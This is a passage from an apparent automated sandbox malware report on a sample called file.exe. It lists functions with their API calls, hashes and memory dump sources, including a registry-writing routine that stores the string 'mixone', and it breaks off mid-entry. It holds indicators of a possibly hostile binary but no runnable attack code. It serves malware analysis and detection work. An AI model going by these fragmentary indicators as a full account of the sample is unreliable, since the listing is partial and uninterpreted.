                                            • Instruction Fuzzy Hash: 5FB1BA71800209EFCF68DFA4CD809AEBBB6FF04314B14815AEA046B215E739FE15DB91
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 0040BDDA
                                            • ___TypeMatch.LIBVCRUNTIME ref: 0040BEE8
                                            • _UnwindNestedFrames.LIBCMT ref: 0040C03A
                                            • CallUnexpected.LIBVCRUNTIME ref: 0040C055
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction ID: 526bd2c442181307887733989819878d768e136a746cf2eec307868f2bd45ee9
                                            • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                            • Instruction Fuzzy Hash: EEB1477180020AEBCF25DFA5C8819AEBBB5EF04314B14416BE815BB292D738DA51CFDD
                                            APIs
                                            • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                            • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                            • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                            • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 2751267872-393685449
                                            • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                            • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                            • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                            • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$___from_strstr_to_strchr
                                            • String ID:
                                            • API String ID: 3409252457-0
                                            • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                            • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                            • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                            • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04B39DE2), ref: 04B39E10
                                            • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04B39DE2), ref: 04B39E1B
                                            • GetModuleHandleW.KERNEL32(0042000C,?,?,04B39DE2), ref: 04B39E2C
                                            • GetProcAddress.KERNEL32(00000000,00420028), ref: 04B39E3E
                                            • GetProcAddress.KERNEL32(00000000,00420044), ref: 04B39E4C
                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04B39DE2), ref: 04B39E6F
                                            • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04B39E8B
                                            • CloseHandle.KERNEL32(0042D060,?,?,04B39DE2), ref: 04B39E9B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                            • String ID:
                                            • API String ID: 2565136772-0
                                            • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction ID: 3a567856b837b7594b73c571e17b65edb2cdf30ab9c96eab89c2d94b2a56cf6a
                                            • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction Fuzzy Hash: 48017575F40721BBD7205BB5FC09F973AE8EB48B06B604475F905E2161DBB4D80B8A68
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _strrchr
                                            • String ID:
                                            • API String ID: 3213747228-0
                                            • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction ID: 0c6895258e89afeb62e0691de77013702d7460a1e7dd886deb0faadc7aaef6c4
                                            • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction Fuzzy Hash: 95B16572A00265AFEF118F68CC81BAE7FB5EFD5714F1441E5E904AB281D274B921E7A0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: _strrchr
                                            • String ID:
                                            • API String ID: 3213747228-0
                                            • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction ID: 4bc1b78499e8cf9151666e6550f0cfc1c6d1214272a43c5cfa1915dac430e096
                                            • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                            • Instruction Fuzzy Hash: C1B11372A00295AFEB168FA8CC81BAEBBA5FF55314F14C165ED44AF2C1D674F901C7A0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: _strrchr
                                            • String ID:
                                            • API String ID: 3213747228-0
                                            • Opcode ID: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                            • Instruction ID: 4a21b80fcc43a582202c6f7144ab3ce64f52356938c116e7343db5097d41ee6d
                                            • Opcode Fuzzy Hash: bf0b0920984447c06244afe43fd9d6a0130e4e86955e3e91be41bedb8128cd91
                                            • Instruction Fuzzy Hash: 57B13672E003559FDB118F65CC81BEF7FA5EF59310F14416BE904AB382D2789A82C7A8
                                            APIs
                                            • __RTC_Initialize.LIBCMT ref: 1000291D
                                            • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: Initialize___scrt_uninitialize_crt
                                            • String ID:
                                            • API String ID: 2442719207-0
                                            • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                            • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                            • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                            • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 04CFABF7
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 04CFABFF
                                            • _ValidateLocalCookies.LIBCMT ref: 04CFAC88
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 04CFACB3
                                            • _ValidateLocalCookies.LIBCMT ref: 04CFAD08
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction ID: a16e463b673d3aa92c2070837d42a8108e391b283d486aeac48eebc019391ff3
                                            • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction Fuzzy Hash: 2941B430A002189BCF50DF68CC84A9EBBB6AF44318F148155EA195B391E73BFA01CB91
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B7F7
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B7FF
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B888
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8B3
                                            • _ValidateLocalCookies.LIBCMT ref: 0040B908
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction ID: 0a5d0bd6c222bbdd43f8b319fa79a96d429a9708f3c046b0ae0cbd11a01f7e51
                                            • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                            • Instruction Fuzzy Hash: 11418535A00219DBCF10EF69C885A9EBBA5EF44318F14C17AE8147B3E2D7399905CBD9
                                            APIs
                                            • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                            • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                            • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 1170836740-1018135373
                                            • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                            • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                            • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                            • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 0-537541572
                                            • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                            • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                            • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                            • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                            APIs
                                            • FreeLibrary.KERNEL32(00000000,?,00413448,00403597,?,00000000,00402809,0040280B,?,004135C1,00000022,FlsSetValue,00422950,00422958,00402809), ref: 004133FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: FreeLibrary
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 3664257935-537541572
                                            • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction ID: 89836d951bc72d4e20e2faa1a52db581b462940ce5fd44a8dff6846afbaeb460
                                            • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                            • Instruction Fuzzy Hash: A3212731B01214EBDB329F21DC44ADB7B68AB41765B200133ED15A73D1DA78EE46C6DC
                                            APIs
                                              • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                            • _free.LIBCMT ref: 1000C60D
                                              • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                              • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                            • _free.LIBCMT ref: 1000C618
                                            • _free.LIBCMT ref: 1000C623
                                            • _free.LIBCMT ref: 1000C677
                                            • _free.LIBCMT ref: 1000C682
                                            • _free.LIBCMT ref: 1000C68D
                                            • _free.LIBCMT ref: 1000C698
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                            • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                            • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                            • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                            • __fassign.LIBCMT ref: 1000B905
                                            • __fassign.LIBCMT ref: 1000B922
                                            • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 1735259414-0
                                            • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                            • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                            • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                            • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                            APIs
                                            • GetLastError.KERNEL32(?,?,04B3BBE2,04B3B186,04B3A997), ref: 04B3BBF9
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B3BC07
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B3BC20
                                            • SetLastError.KERNEL32(00000000,04B3BBE2,04B3B186,04B3A997), ref: 04B3BC72
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction ID: b16783f0c39d57c56231594f66b76ed3a4328b34f292f82a0de426df033f02d1
                                            • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction Fuzzy Hash: 3F01B53630D2119EAB342BFB7CC4A6B3F54EB01A7E76002BAF125661E6EE5178027184
                                            APIs
                                            • GetLastError.KERNEL32(?,?,0040B97B,0040AF1F,0040A730), ref: 0040B992
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9A0
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9B9
                                            • SetLastError.KERNEL32(00000000,0040B97B,0040AF1F,0040A730), ref: 0040BA0B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction ID: c1383cefff0a9c77c0f6256a7d22d0577fd0bc713188e5814d490c4ea7085b9f
                                            • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                            • Instruction Fuzzy Hash: 6D0192727197119EE63427B97CC6A6B2B94EB01778760033BF520752E2EB39480255CC
                                            APIs
                                            • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                            • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue___vcrt_
                                            • String ID:
                                            • API String ID: 3852720340-0
                                            • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                            • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                            • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                            • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 004015D5
                                              • Part of subcall function 00409842: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040984E
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 0040160B
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 00401642
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00401757
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                            • String ID: string too long
                                            • API String ID: 2123813255-2556327735
                                            • Opcode ID: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                            • Instruction ID: 8b29ff92f67febe7d184f40cd986ab90276924f3587203b15f4be4e0e60d2281
                                            • Opcode Fuzzy Hash: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                            • Instruction Fuzzy Hash: 5E4127B1A00300ABD720AF759C8575BB7B8EF48354F24063AF91AE73D1E775AD0487A9
                                            APIs
                                            • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                            • Sleep.KERNEL32(000005DC), ref: 00405A90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CloseCreateOpenSleepValue
                                            • String ID: mixone
                                            • API String ID: 4111408922-3123478411
                                            • Opcode ID: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                            • Instruction ID: 36deb0a2def4af7d69c3889f60f670a394a8a5da25757ff3a02b89eea185ed5b
                                            • Opcode Fuzzy Hash: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                            • Instruction Fuzzy Hash: F3418571210108AFEB08DF58DC95BEE7B65EF08300F908229F955AB5D1D778E9848F58
                                            Strings
                                            • C:\Users\user\Desktop\file.exe, xrefs: 1000833B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: C:\Users\user\Desktop\file.exe
                                            • API String ID: 0-517116171
                                            • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                            • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                            • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                            • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,CA335CE0,0040280B,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105B5
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004105C7
                                            • FreeLibrary.KERNEL32(00000000,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105E9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                            • Instruction ID: f4dd53f2cc94282f557b0741292325b7031a84366b21a1c3c136dd1e19965a8c
                                            • Opcode Fuzzy Hash: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                            • Instruction Fuzzy Hash: F501A271A44625FBDB128F80DC05BEEBBB9FB04B51F004536F811A22A0DBB8A944CB58
                                            APIs
                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                            • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                            • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
